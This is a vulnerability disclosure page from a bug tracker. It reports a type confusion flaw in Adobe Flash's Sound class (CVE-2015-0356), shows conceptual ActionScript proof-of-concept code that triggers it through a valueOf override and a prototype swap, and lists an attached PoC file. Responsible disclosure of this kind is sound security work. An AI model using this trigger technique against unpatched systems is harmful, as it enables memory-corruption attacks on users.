New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 262
Starred by 2 users
Status: Fixed
Owner:
cevans@google.com
Email to this user bounced
Closed: Apr 2015
Cc:
project-...@google.com



Sign in to add a comment
 Adobe Flash: Type Confusion in Sound class
Project Member Reported by natashenka@google.com, Feb 13 2015 Back to list 
There is a type confusion issue in the Sound class (for all methods). The this object's type is checked, but then valueOf in another parameter in the method is called, and can change the type of the object before the pointer is actually cast to a native sound object.

The code for this issue does not compile, so the POC was created by compiling similar code and altering the SWF. But conceptually, the code for the issue is as follows:

	function mysubclass(a){
		
		super();
		var s = super;
		function func(){

			trace(s);
			super(0);
			return 10;
			}
	    
			var n = {test: "hello"};
			n.valueOf = func;
			var f = this.loadSound;
			this.__proto__={};
			this.__proto__.__constructor__ =  Date;
			f.call(this, n, n);
		
		
		} 

A PoC swf is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
super.swf
1.2 KB Download
Project Member Comment 1 by natashenka@google.com, Feb 13 2015
Summary: Adobe Flash: Type Confusion in Sound class (was: Type Confusion in Sound class)
Comment 2 by cevans@google.com, Feb 13 2015
Labels: Id-3311
Comment 3 by cevans@google.com, Mar 26 2015 
Possibly fixed by https://helpx.adobe.com/security/products/flash-player/apsb15-05.html ? Mailing Adobe to check.
Comment 4 by cevans@google.com, Apr 10 2015
Labels: CVE-2015-0356
Project Member Comment 6 by natashenka@google.com, Apr 24 2015
Labels: -Restrict-View-Commit
Sign in to add a comment